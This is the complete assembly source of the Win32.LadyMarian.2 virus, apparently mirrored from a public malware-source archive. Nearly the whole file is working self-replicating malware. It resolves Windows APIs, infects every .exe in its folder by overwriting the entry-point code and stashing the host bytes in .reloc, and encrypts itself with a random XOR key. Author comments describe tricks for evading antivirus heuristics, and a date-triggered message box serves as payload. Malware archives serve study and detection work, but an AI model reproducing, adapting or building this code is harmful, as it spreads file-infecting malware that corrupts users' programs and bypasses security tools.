mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-23 20:05:26 +00:00
774 lines
20 KiB
NASM
774 lines
20 KiB
NASM
|
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
;
|
|||
|
;
|
|||
|
;
|
|||
|
; Win32.LadyMarian.2
|
|||
|
; Coded By ValleZ.
|
|||
|
; Size: 848h bytes.
|
|||
|
;
|
|||
|
; This is my second virus and probably virus had not optimized code,or bad ideas,or
|
|||
|
; other things,but,as i said,its my second so im excused :P if its a lame virus.
|
|||
|
; Well,i thing this is a interesting virus becoz it infect with a method that i hadnt seen
|
|||
|
; before(however i dont say it no exist,but i havent seen it). Virus overwrite code
|
|||
|
; of host,over entry point,after it has copy host code in .reloc.When it returns to host
|
|||
|
; it copy again host to entry point and jmp there.Virus place return to host rutine in
|
|||
|
; imagebase + 26h, in word oeminfo and 5 * dword reserved.
|
|||
|
; Virus is encrypted with random key.
|
|||
|
; Virus no change flags of code section where it overwrite code of host becoz avs heuristic
|
|||
|
; could detect it. It use VirtualProtect api to set his memory as writable.
|
|||
|
; I want to include some antidebug rutines in virus code but finally i think better not
|
|||
|
; becoz size of virus is 848h bytes...and if it grow up very much probably it cannot infect
|
|||
|
; any file becoz it will be more big than reloc.
|
|||
|
; Virus doesnt increase size of file and no change entry point.
|
|||
|
; It places his own SEH and test files with SfcIsFileProtected api when sfc.dll exists.
|
|||
|
; It infects all files in his folder that can be infected.
|
|||
|
; In NT machines only infect if it has necesary permission.
|
|||
|
; In header it only change: ImageBase + 26h to ImageBase + 3ch,with code to return host.
|
|||
|
; Byte 1 of TimeDateStamp in PEheader + 08h.
|
|||
|
; Flags of .reloc to do it not discarcheable.
|
|||
|
;
|
|||
|
;
|
|||
|
; Payload: show a message box with no button :P close it with ctrl + alt + supr
|
|||
|
; No more things.
|
|||
|
; This virus is for Lady Mariam,the best girl in the world.
|
|||
|
;
|
|||
|
; Thx:
|
|||
|
; Xezaw,my m3nt0r who shows me all i know :)
|
|||
|
; mscorlib,thx for that help that u gave me :) u r a genius :D
|
|||
|
; GriYo,thx u too for ur help too :)
|
|||
|
;
|
|||
|
; Sorry,my english is very bad so plz,excuse me.
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
|
|||
|
|
|||
|
|
|||
|
.586p
|
|||
|
.model flat,stdcall
|
|||
|
|
|||
|
|
|||
|
extrn ExitProcess:proc
|
|||
|
|
|||
|
sizeVir = endVir - startVir
|
|||
|
sizecrypt = decryptz - retHost
|
|||
|
.data
|
|||
|
db 0
|
|||
|
.code
|
|||
|
start:
|
|||
|
startVir:
|
|||
|
push ebx ;registers preserved too
|
|||
|
push ecx
|
|||
|
push edx
|
|||
|
push esi
|
|||
|
push edi
|
|||
|
push ebp
|
|||
|
|
|||
|
call d_offset ;delta offset
|
|||
|
d_offset:
|
|||
|
pop ebp
|
|||
|
sub EBP,offset d_offset
|
|||
|
jmp decryptz
|
|||
|
retHost:
|
|||
|
SEHout:
|
|||
|
mov esp,00000000h
|
|||
|
|
|||
|
pop dword ptr fs:[0] ;SEH return
|
|||
|
pop ebp
|
|||
|
pop ebp ;ebp too was saved,so we can restore it
|
|||
|
|
|||
|
lea eax,[ebp + offset baseCalc]
|
|||
|
xor al,al
|
|||
|
|
|||
|
xor ecx,ecx
|
|||
|
mov cx,100h
|
|||
|
add eax,ecx
|
|||
|
baseCalc:
|
|||
|
sub eax,ecx
|
|||
|
cmp word ptr [eax],'ZM' ;search for image base
|
|||
|
jne baseCalc
|
|||
|
|
|||
|
mov esi,[eax + 1ch] ;dir of reloc
|
|||
|
add esi,eax ;this header dword is modified
|
|||
|
;when file is infected
|
|||
|
mov ecx, [eax+3Ch]
|
|||
|
add ecx, eax
|
|||
|
mov dx,[ecx + 8]
|
|||
|
cmp dx,'vz' ;test if this is a infected file,
|
|||
|
jne Exit ;second generation,i no test it with
|
|||
|
;or ebp,ebp becoz
|
|||
|
;with this infection method
|
|||
|
;sometimes ebp = 0 in 2<> gen.
|
|||
|
|
|||
|
lea edi,[ebp + startVir]
|
|||
|
add eax,26h ;goto return code in image base + 26h
|
|||
|
|
|||
|
jmp eax
|
|||
|
Exit:
|
|||
|
push 0
|
|||
|
call ExitProcess
|
|||
|
|
|||
|
ReturnHost:
|
|||
|
|
|||
|
;return host code.It is put in dos
|
|||
|
;header 5 reserved dwords + oeminfo.
|
|||
|
mov eax,edi
|
|||
|
mov ecx,sizeVir + 1
|
|||
|
|
|||
|
again1: rep movsb ;copy host code in entry point direction
|
|||
|
jcxz next1 ;to recover the host body and
|
|||
|
loop again1 ;next jmp to entry point and begin
|
|||
|
next1: ;execution of host.
|
|||
|
pop ebp
|
|||
|
pop edi
|
|||
|
pop esi ;i think some programs fails if not preserve
|
|||
|
pop edx
|
|||
|
pop ecx
|
|||
|
pop ebx
|
|||
|
jmp eax
|
|||
|
ReturnHost_:
|
|||
|
|
|||
|
|
|||
|
vir:
|
|||
|
xor edx,edx ;small fix :P
|
|||
|
mov [ebp + SfcIsFileProtectedz],edx ;sometimes fault becoz
|
|||
|
;thought it has sfc api
|
|||
|
|
|||
|
|
|||
|
;my SetWritrableCode rutine is prepared for with a few
|
|||
|
;changes can search a api directly from export.
|
|||
|
;really,rutine search VirtualProtect for
|
|||
|
;change virus pages to readable,writable and executable
|
|||
|
;but putting GetProcAddress offset in repuse + 2 and
|
|||
|
;putting a ret in a good site rutine will search
|
|||
|
;GetProcAddress and we not spend bytes in repeat code ;)
|
|||
|
|
|||
|
mov eax,offset GPA
|
|||
|
mov dword ptr [ebp + repuse + 2],eax
|
|||
|
mov ax,0c35bh ;pop ebx,ret
|
|||
|
mov word ptr [ebp + repuse2],ax
|
|||
|
lea eax,[ebp + SetWritableCode]
|
|||
|
call eax
|
|||
|
|
|||
|
;of course after use rutine for our propose
|
|||
|
;we must rewrite good offset of VP and good code
|
|||
|
;where we write ret becoz when infect next generation
|
|||
|
;file the code of rutine must be the first
|
|||
|
|
|||
|
|
|||
|
lea ebx,[ebp + offset VP]
|
|||
|
mov dword ptr [ebp + repuse + 2],ebx
|
|||
|
mov cx,6a54h
|
|||
|
mov word ptr [ebp + repuse2],cx
|
|||
|
mov edi,[ebp + kern]
|
|||
|
mov [EBP + offset GetProcAddressz],EAX
|
|||
|
|
|||
|
|
|||
|
;we have GetProcAddress,we can be happy! We can get all apis we need and
|
|||
|
;we can start to infect files ;)
|
|||
|
;next code calc apis
|
|||
|
;In data apis must be in this form:
|
|||
|
;api1kernel 0 api2kernel 0 ... apiNkernel 00 Library1nxt 0 api1nxtLib 0 api2nxtLib 0
|
|||
|
;... apiNnxtLib 00 ... LibreriaNnxt 000
|
|||
|
;00 is change of library and 000 is finish of apis
|
|||
|
|
|||
|
|
|||
|
lea ESI,[EBP + offset ApisNames]
|
|||
|
mov ebx,edi
|
|||
|
mov ECX,[EBP + offset GetProcAddressz]
|
|||
|
lea EDX,[EBP + offset dirApis]
|
|||
|
|
|||
|
nextAPI:
|
|||
|
|
|||
|
push EDX
|
|||
|
push ESI
|
|||
|
push ebx
|
|||
|
mov edx,[ebp + GetProcAddressz]
|
|||
|
call edx
|
|||
|
pop EDX
|
|||
|
mov [EDX],EAX
|
|||
|
add EDX,4h
|
|||
|
searchApis:
|
|||
|
inc ESI
|
|||
|
mov AL,byte ptr[ESI]
|
|||
|
or AL,AL
|
|||
|
jnz searchApis
|
|||
|
|
|||
|
inc ESI
|
|||
|
mov AL,byte ptr[ESI]
|
|||
|
or AL,al
|
|||
|
jnz nextAPI
|
|||
|
|
|||
|
inc ESI
|
|||
|
mov AL,byte ptr[ESI]
|
|||
|
or AL,al
|
|||
|
jz allApisFounds
|
|||
|
|
|||
|
|
|||
|
push EDX
|
|||
|
|
|||
|
cmp ebx,[EBP + offset kern]
|
|||
|
je IsKern
|
|||
|
|
|||
|
IsKern: push ESI
|
|||
|
mov eax,dword ptr [ebp + offset LoadLibraryAz]
|
|||
|
call eax
|
|||
|
or eax,eax ;por la sfc.dll en 9x
|
|||
|
jz allApisButSfcNot
|
|||
|
|
|||
|
mov EBX,EAX
|
|||
|
pop EDX
|
|||
|
|
|||
|
jmp searchApis
|
|||
|
|
|||
|
|
|||
|
allApisButSfcNot:
|
|||
|
pop edx
|
|||
|
allApisFounds:
|
|||
|
|
|||
|
|
|||
|
SEH: ;set SEH for me,save ebp too
|
|||
|
|
|||
|
push ebp
|
|||
|
lea eax,[ebp + retHost]
|
|||
|
push eax
|
|||
|
mov eax,fs:[0]
|
|||
|
push eax
|
|||
|
mov fs:[0],esp
|
|||
|
mov dword ptr[ebp + offset SEHout + 1],esp
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;payload only show a message box if 23-7-XX,but when i had a moment ill put some payload
|
|||
|
;a few more original :P
|
|||
|
|
|||
|
Payload: ;payload (only 9x)
|
|||
|
|
|||
|
mov eax,dword ptr [ebp + offset GetVersionz]
|
|||
|
call eax
|
|||
|
test EAX,08000000h
|
|||
|
jnz FirstFile
|
|||
|
lea ESI, [EBP + offset SystemTime]
|
|||
|
push ESI
|
|||
|
mov eax,[EBP + offset GetSystemTimez]
|
|||
|
call eax
|
|||
|
cmp [ESI.ST_wMonth],7
|
|||
|
jne FirstFile
|
|||
|
cmp [ESI.ST_wDay],23
|
|||
|
jne FirstFile
|
|||
|
lea eax,[ebp + pay]
|
|||
|
lea esi,[ebp + paytit]
|
|||
|
push 07h
|
|||
|
push esi
|
|||
|
push eax
|
|||
|
push 0
|
|||
|
mov eax,dword ptr [ebp + offset MessageBoxAz]
|
|||
|
call eax
|
|||
|
|
|||
|
FirstFile: ;infect all .exe in his folder that could infect
|
|||
|
|
|||
|
lea eax,[ebp + offset files]
|
|||
|
lea ESI,[ebp + offset WIN32_FIND_DATA]
|
|||
|
push ESI
|
|||
|
push EAX
|
|||
|
mov eax,dword ptr [ebp + offset FindFirstFileAz]
|
|||
|
call eax
|
|||
|
inc eax
|
|||
|
jz retHost
|
|||
|
dec eax
|
|||
|
mov [ebp + handFile],eax
|
|||
|
jmp infection
|
|||
|
NextFile:
|
|||
|
push dword ptr [ebp+WFD_dwFileAttributes]
|
|||
|
lea eax, [ebp + WFD_szFileName]
|
|||
|
push eax
|
|||
|
mov eax,dword ptr [ebp + offset SetFileAttributesAz]
|
|||
|
call eax
|
|||
|
|
|||
|
lea ESI,[ebp + offset WIN32_FIND_DATA]
|
|||
|
mov eax,[ebp + handFile]
|
|||
|
push esi
|
|||
|
push eax
|
|||
|
mov eax, dword ptr [ebp + offset FindNextFileAz]
|
|||
|
call eax
|
|||
|
or eax,eax
|
|||
|
jz retHost
|
|||
|
infection:
|
|||
|
|
|||
|
lea edi,[ebp + offset WFD_szFileName]
|
|||
|
mov eax,dword ptr [ebp + offset GetVersionz]
|
|||
|
call eax
|
|||
|
test EAX,08000000h
|
|||
|
jz _9x
|
|||
|
NT:
|
|||
|
|
|||
|
;in NT only infect if have permiss
|
|||
|
|
|||
|
mov eax,[ebp + offset WFD_dwFileAttributes]
|
|||
|
test eax,1915h
|
|||
|
jnz NextFile
|
|||
|
|
|||
|
_9x: ;sfp?? i test it for NT and 9x becoz i have listened
|
|||
|
;millenium have it too,true?
|
|||
|
|
|||
|
push edi
|
|||
|
push 0
|
|||
|
mov eax,[ebp + SfcIsFileProtectedz]
|
|||
|
or eax,eax
|
|||
|
jz nosfc
|
|||
|
call eax
|
|||
|
or eax,eax
|
|||
|
jnz NextFile
|
|||
|
nosfc:
|
|||
|
;next part is tipycal file mapping
|
|||
|
|
|||
|
push 80h
|
|||
|
push edi
|
|||
|
mov eax, dword ptr[ebp + offset SetFileAttributesAz]
|
|||
|
call eax
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push 3
|
|||
|
push eax
|
|||
|
inc eax
|
|||
|
push eax
|
|||
|
push 0C0000000h
|
|||
|
push edi
|
|||
|
mov eax,dword ptr [ebp + offset CreateFileAz]
|
|||
|
call eax
|
|||
|
inc eax
|
|||
|
or eax,eax
|
|||
|
jz Closed
|
|||
|
dec eax
|
|||
|
mov [ebp + offset CreateFileHand],eax
|
|||
|
xor ebx,ebx
|
|||
|
push ebx
|
|||
|
push dword ptr[ebp+ offset WFD_nFileSizeLow]
|
|||
|
push ebx
|
|||
|
push 4
|
|||
|
push ebx
|
|||
|
push eax
|
|||
|
mov eax, dword ptr [ebp + offset CreateFileMappingAz]
|
|||
|
call eax
|
|||
|
or eax,eax
|
|||
|
jz CloseFile
|
|||
|
mov [ebp + offset CreateFileMappingHand],eax
|
|||
|
push dword ptr[ebp + offset WFD_nFileSizeLow]
|
|||
|
xor ebx,ebx
|
|||
|
push ebx
|
|||
|
push ebx
|
|||
|
push 000F001Fh
|
|||
|
push eax
|
|||
|
mov eax, dword ptr [ebp + offset MapViewOfFilez]
|
|||
|
call eax
|
|||
|
or eax,eax
|
|||
|
jz CloseMapping
|
|||
|
mov [ebp + offset MapViewOfFileHand],eax
|
|||
|
mov edi,eax
|
|||
|
cmp word ptr [edi],'ZM' ;test if PE file
|
|||
|
jne CloseView
|
|||
|
cmp word ptr[edi + 8],4
|
|||
|
jne CloseView
|
|||
|
mov esi,[edi + 3ch]
|
|||
|
add esi,edi
|
|||
|
cmp word ptr[esi],'EP'
|
|||
|
jne CloseView
|
|||
|
mov ax,[esi + 8] ;not infected yet??
|
|||
|
cmp ax,'vz'
|
|||
|
je CloseView
|
|||
|
mov eax,[esi + 28h]
|
|||
|
|
|||
|
xor ebx,ebx
|
|||
|
mov bx,word ptr[esi + 14h]
|
|||
|
add ebx,18h
|
|||
|
add ebx,esi
|
|||
|
push ebx
|
|||
|
|
|||
|
BuscaEntrySec:
|
|||
|
mov ecx,dword ptr[ebx + 0ch]
|
|||
|
add ecx,dword ptr[ebx + 10h] ;search for entryPoint section,
|
|||
|
cmp eax,ecx ;the section where is entryPoint.
|
|||
|
jb EntrySection
|
|||
|
add ebx,28h
|
|||
|
jmp BuscaEntrySec
|
|||
|
|
|||
|
EntrySection:
|
|||
|
mov edx,[esi + 28h]
|
|||
|
sub edx,[ebx + 0ch]
|
|||
|
add edx,[ebx + 14h] ;offset of Epoint in file.No RVA.
|
|||
|
add edx,edi
|
|||
|
;AddressOfEntryPoint - VAsection + PointerToRawData
|
|||
|
|
|||
|
mov [ebp + offset EntryPointInFile],edx
|
|||
|
|
|||
|
sub ecx,eax ;SectionEnd - entryPoint
|
|||
|
|
|||
|
mov eax,sizeVir
|
|||
|
cmp ecx,eax
|
|||
|
jb nxt ;enought size for put virus?
|
|||
|
jmp nonxt
|
|||
|
|
|||
|
nxt:
|
|||
|
pop ebx
|
|||
|
jmp CloseView
|
|||
|
|
|||
|
nonxt:
|
|||
|
|
|||
|
mov ecx,eax
|
|||
|
pop ebx
|
|||
|
push ecx
|
|||
|
mov cx,[esi + 6]
|
|||
|
sub ebx,28h
|
|||
|
inc cx
|
|||
|
buscaReloc:
|
|||
|
|
|||
|
dec cx ;searching for reloc
|
|||
|
or cx,cx
|
|||
|
jz nxt2
|
|||
|
jmp nonxt2
|
|||
|
|
|||
|
nxt2:
|
|||
|
pop ecx ;no .reloc
|
|||
|
jmp CloseView
|
|||
|
nonxt2:
|
|||
|
add ebx,28h ;is this section .reloc?? compare...
|
|||
|
lea eax,[ebp + offset reloc]
|
|||
|
push ebx
|
|||
|
push eax
|
|||
|
lea eax,[ebp + offset compara]
|
|||
|
call eax
|
|||
|
pop edx
|
|||
|
pop edx
|
|||
|
or eax,eax
|
|||
|
jne buscaReloc
|
|||
|
|
|||
|
pop ecx
|
|||
|
cmp dword ptr [ebx + 10h],ecx
|
|||
|
;enought space in reloc for virus?
|
|||
|
|
|||
|
jb CloseView
|
|||
|
|
|||
|
push ebx
|
|||
|
push esi
|
|||
|
mov eax,dword ptr [ebx + 0ch]
|
|||
|
mov [edi + 1ch],eax ;reloc dir for nxt gen
|
|||
|
mov ebx,[ebx + 14h] ;go start .reloc
|
|||
|
add ebx,edi
|
|||
|
|
|||
|
;copy return to host code to imagebase + 26h,overwriting oeminfo and next 5 reverved word.
|
|||
|
;returnHost is 22 bytes, word oeminfo + 5 * dword reserveds ;)
|
|||
|
|
|||
|
CopyToReserved:
|
|||
|
|
|||
|
add edi,26h
|
|||
|
lea esi,[ebp + offset ReturnHost]
|
|||
|
tamReturn = ReturnHost_ - ReturnHost
|
|||
|
xor ecx,ecx
|
|||
|
mov cl,tamReturn
|
|||
|
|
|||
|
again2: rep movsb ;copying...
|
|||
|
jcxz next2
|
|||
|
loop again2
|
|||
|
next2:
|
|||
|
|
|||
|
CopyReloc: mov esi,[ebp + offset EntryPointInFile]
|
|||
|
mov edi,ebx
|
|||
|
|
|||
|
|
|||
|
mov ecx,sizeVir+1 ;copy host in reloc for recover later...
|
|||
|
again3: rep movsb
|
|||
|
jcxz next3
|
|||
|
loop again3
|
|||
|
next3:
|
|||
|
|
|||
|
|
|||
|
lea esi,[ebp + offset startVir]
|
|||
|
mov edi,[ebp + offset EntryPointInFile]
|
|||
|
mov eax,edi
|
|||
|
|
|||
|
|
|||
|
mov ecx,sizeVir ;copying...
|
|||
|
again4: rep movsb ;overwriting host with virus >:D
|
|||
|
jcxz next4
|
|||
|
loop again4
|
|||
|
next4:
|
|||
|
|
|||
|
|
|||
|
sizedecrypt = endVir - decryptz
|
|||
|
|
|||
|
sub edi,sizedecrypt
|
|||
|
mov ecx,sizecrypt
|
|||
|
mov eax,[ebp + GetTickCountz]
|
|||
|
call eax
|
|||
|
cryptaz:
|
|||
|
dec edi ;crypt byte to byte with random key
|
|||
|
xor byte ptr[edi],al
|
|||
|
loop cryptaz
|
|||
|
|
|||
|
pop esi
|
|||
|
pop ebx
|
|||
|
|
|||
|
mov dword ptr [ebx + 24h],40000040h
|
|||
|
;reloc not discarchable!!
|
|||
|
;i think avs no see this flag ;)
|
|||
|
|
|||
|
CloseHandlesInfectado:
|
|||
|
mov ax,'vz'
|
|||
|
mov [esi + 8],ax
|
|||
|
|
|||
|
CloseView:
|
|||
|
push dword ptr[ebp + offset MapViewOfFileHand]
|
|||
|
mov eax, dword ptr [ebp + offset UnmapViewOfFilez]
|
|||
|
call eax
|
|||
|
CloseMapping:
|
|||
|
push dword ptr[ebp + offset CreateFileMappingHand]
|
|||
|
mov eax,dword ptr[ebp + offset CloseHandlez]
|
|||
|
call eax
|
|||
|
CloseFile:
|
|||
|
push dword ptr[ebp + offset CreateFileHand]
|
|||
|
mov eax, dword ptr[ebp + offset CloseHandlez]
|
|||
|
call eax
|
|||
|
Closed:
|
|||
|
jmp NextFile
|
|||
|
|
|||
|
|
|||
|
datos:
|
|||
|
kernel32_ db 'Kernel32',0
|
|||
|
reloc db '.reloc',0
|
|||
|
GPA db 'GetProcAddress',0
|
|||
|
files db '*.exe',0
|
|||
|
pay db 'This virus is for you,for Lady Marian.',0dh
|
|||
|
db ' You are the only girl in the world',0dh
|
|||
|
db 'whose i have in loved and never other girl',0dh
|
|||
|
db ' could be in my heart so you have been.',0dh
|
|||
|
paytit db ' i will not forget you...',0
|
|||
|
|
|||
|
ApisNames:
|
|||
|
db 'LoadLibraryA',0
|
|||
|
db 'GetSystemTime',0
|
|||
|
db 'CreateFileA',0
|
|||
|
db 'CreateFileMappingA',0
|
|||
|
db 'MapViewOfFile',0
|
|||
|
db 'CloseHandle',0
|
|||
|
db 'UnmapViewOfFile',0
|
|||
|
db 'FindFirstFileA',0
|
|||
|
db 'FindNextFileA',0
|
|||
|
db 'GetTickCount',0
|
|||
|
db 'GetVersion',0
|
|||
|
db 'SetFileAttributesA',0
|
|||
|
db 'ExitProcess',0
|
|||
|
db 0
|
|||
|
db 'User32',0
|
|||
|
db 'MessageBoxA',0
|
|||
|
db 0
|
|||
|
db 'sfc',0
|
|||
|
db 'SfcIsFileProtected',0
|
|||
|
finAPIS dw 00h
|
|||
|
|
|||
|
|
|||
|
dirApis:
|
|||
|
LoadLibraryAz dd 0
|
|||
|
GetSystemTimez dd 0
|
|||
|
CreateFileAz dd 0
|
|||
|
CreateFileMappingAz dd 0
|
|||
|
MapViewOfFilez dd 0
|
|||
|
CloseHandlez dd 0
|
|||
|
UnmapViewOfFilez dd 0
|
|||
|
FindFirstFileAz dd 0
|
|||
|
FindNextFileAz dd 0
|
|||
|
GetTickCountz dd 0
|
|||
|
GetVersionz dd 0
|
|||
|
SetFileAttributesAz dd 0
|
|||
|
ExitProcessz dd 0
|
|||
|
MessageBoxAz dd 0
|
|||
|
SfcIsFileProtectedz dd 0
|
|||
|
|
|||
|
|
|||
|
CreateFileHand dd 0
|
|||
|
CreateFileMappingHand dd 0
|
|||
|
MapViewOfFileHand dd 0
|
|||
|
EntryPointInFile dd 0
|
|||
|
handFile dd 0
|
|||
|
GetProcAddressz dd 0
|
|||
|
|
|||
|
|
|||
|
Max_Path equ 260
|
|||
|
|
|||
|
FILETIME struc
|
|||
|
FT_dwLowDateTime dd ?
|
|||
|
FT_dwHighDateTime dd ?
|
|||
|
FILETIME ends
|
|||
|
|
|||
|
WIN32_FIND_DATA label byte
|
|||
|
WFD_dwFileAttributes dd ?
|
|||
|
WFD_ftCreationTime FILETIME ?
|
|||
|
WFD_ftLastAccessTime FILETIME ?
|
|||
|
WFD_ftLastWriteTime FILETIME ?
|
|||
|
WFD_nFileSizeHigh dd ?
|
|||
|
WFD_nFileSizeLow dd ?
|
|||
|
WFD_dwReserved0 dd ?
|
|||
|
WFD_dwReserved1 dd ?
|
|||
|
WFD_szFileName db Max_Path dup (?)
|
|||
|
WFD_szAlternateFileName db 13 dup (?)
|
|||
|
db 03 dup (?)
|
|||
|
|
|||
|
SYSTEMTIME struct
|
|||
|
ST_wYear dw ?
|
|||
|
ST_wMonth dw ?
|
|||
|
ST_wDayOfWeek dw ?
|
|||
|
ST_wDay dw ?
|
|||
|
ST_wHour dw ?
|
|||
|
ST_wMinute dw ?
|
|||
|
ST_wSecond dw ?
|
|||
|
ST_wMilliseconds dw ?
|
|||
|
SYSTEMTIME ends
|
|||
|
SystemTime SYSTEMTIME ?
|
|||
|
|
|||
|
decryptz:
|
|||
|
|
|||
|
call SetWritableCode
|
|||
|
|
|||
|
cmp byte ptr [ebp + offset retHost],0BCh ;encrypted??
|
|||
|
je vir ;if no encryted jmp code
|
|||
|
xor ecx,ecx
|
|||
|
dec ecx
|
|||
|
whatkey:
|
|||
|
mov al,byte ptr [ebp + retHost]
|
|||
|
;search the encryption key
|
|||
|
xor al,cl
|
|||
|
sub al,0bch
|
|||
|
jz keyfound
|
|||
|
loop whatkey
|
|||
|
|
|||
|
keyfound:
|
|||
|
mov dl,cl
|
|||
|
lea esi,[ebp + offset retHost]
|
|||
|
mov edi,esi
|
|||
|
mov ecx,sizecrypt
|
|||
|
decrypt:
|
|||
|
db 0d6h ;setalc,undocumented,antiheuristic,is good today???
|
|||
|
lodsb
|
|||
|
xor al,dl
|
|||
|
stosb
|
|||
|
loop decrypt
|
|||
|
jmp vir
|
|||
|
|
|||
|
;SetWritableCode rutine searchs VirtualProtect in kernel export table for calling it
|
|||
|
;later and do writable virus code memory zone.Why? Virus code is on code section
|
|||
|
;and if code section flags say writable section,avs will see it and will advise
|
|||
|
;user that infect file is a posible virus :S so we no set that flag and avs will be
|
|||
|
;in silent :)
|
|||
|
;In addition with a few modifications explanated and do up,this rutine will search
|
|||
|
;getProcAddress so we dont spend bytes in repeat code ;)
|
|||
|
|
|||
|
|
|||
|
SetWritableCode:
|
|||
|
mov EAX,[ESP + 28]
|
|||
|
xor AX,AX
|
|||
|
mov edx,1000h
|
|||
|
add eax,edx
|
|||
|
|
|||
|
VPsearch_kernel:
|
|||
|
sub eax,edx
|
|||
|
mov CX,word ptr[EAX]
|
|||
|
cmp CX, 'ZM'
|
|||
|
jne VPsearch_kernel
|
|||
|
mov edi,eax
|
|||
|
mov EAX,[EAX + 3Ch] ;PE
|
|||
|
add EAX,edi
|
|||
|
mov EAX,[EAX + 78h] ;Dir entrys
|
|||
|
|
|||
|
add EAX,edi ;export table
|
|||
|
|
|||
|
push eax
|
|||
|
|
|||
|
|
|||
|
mov ECX,[EAX + 20h] ;exported func names
|
|||
|
add ECX,edi
|
|||
|
xor EDX,EDX
|
|||
|
VPrepeat:
|
|||
|
mov EBX,[ECX]
|
|||
|
add EBX,edi
|
|||
|
|
|||
|
PUSH EBX ;search GetProcAddress
|
|||
|
repuse:
|
|||
|
lea EBX,[EBP + offset VP]
|
|||
|
PUSH EBX
|
|||
|
lea ebx,[ebp + offset compara]
|
|||
|
call ebx
|
|||
|
POP EBX
|
|||
|
POP EBX
|
|||
|
or EAX,eax
|
|||
|
jz VPfinality
|
|||
|
add ECX,4
|
|||
|
inc edx
|
|||
|
inc edx
|
|||
|
jmp VPrepeat ;edx index ordinal
|
|||
|
|
|||
|
VPfinality:
|
|||
|
mov EAX,[esp]
|
|||
|
mov EAX,[EAX + 24h]
|
|||
|
add EAX,edi ;eax -> ordinal
|
|||
|
add EAX,EDX ;add index
|
|||
|
mov EAX,[EAX] ;index for export address table
|
|||
|
shr EAX,10h
|
|||
|
|
|||
|
dec EAX
|
|||
|
mov EBX,[esp]
|
|||
|
mov EBX,[EBX + 1ch] ;array of dirs of func
|
|||
|
add EBX,edi ;we index it in eax
|
|||
|
add EAX,EAX
|
|||
|
add EAX,EAX
|
|||
|
add EAX,EBX
|
|||
|
mov EAX,[EAX] ;dir of VirtualProtect
|
|||
|
add EAX,edi
|
|||
|
repuse2:
|
|||
|
push esp ;lpflOldProtect is a stack dword
|
|||
|
push 40h ;writable,readable and executable
|
|||
|
push sizeVir ;size of memory to put writable
|
|||
|
lea ebx,[ebp + startVir]
|
|||
|
push ebx
|
|||
|
call eax
|
|||
|
pop eax
|
|||
|
mov [ebp + kern],edi
|
|||
|
ret
|
|||
|
|
|||
|
;this useful ritune compare 2 strings and return 0 if they are identical and 1 if not.
|
|||
|
|
|||
|
compara:
|
|||
|
|
|||
|
push ECX
|
|||
|
push ESI
|
|||
|
push edi
|
|||
|
|
|||
|
mov ESI,[ESP + 20]
|
|||
|
mov EDI,[ESP + 16]
|
|||
|
mov ecx,esi
|
|||
|
endString:
|
|||
|
lodsb ;lenght of string
|
|||
|
or al,al
|
|||
|
jnz endString
|
|||
|
|
|||
|
sub esi,ecx
|
|||
|
xchg esi,ecx ;ecx = lenght esi = start
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
|
|||
|
repz cmpsb
|
|||
|
je endCompara
|
|||
|
inc eax
|
|||
|
endCompara:
|
|||
|
pop edi
|
|||
|
POP ESI
|
|||
|
POP ECX
|
|||
|
|
|||
|
ret
|
|||
|
|
|||
|
;arrrggghtt!! damn,i have had headache becoz i was using VP string before decrypt it!! ;@
|
|||
|
|
|||
|
VP db 'VirtualProtect',0
|
|||
|
kern dd 0
|
|||
|
endVir:
|
|||
|
end start
|
|||
|
end
|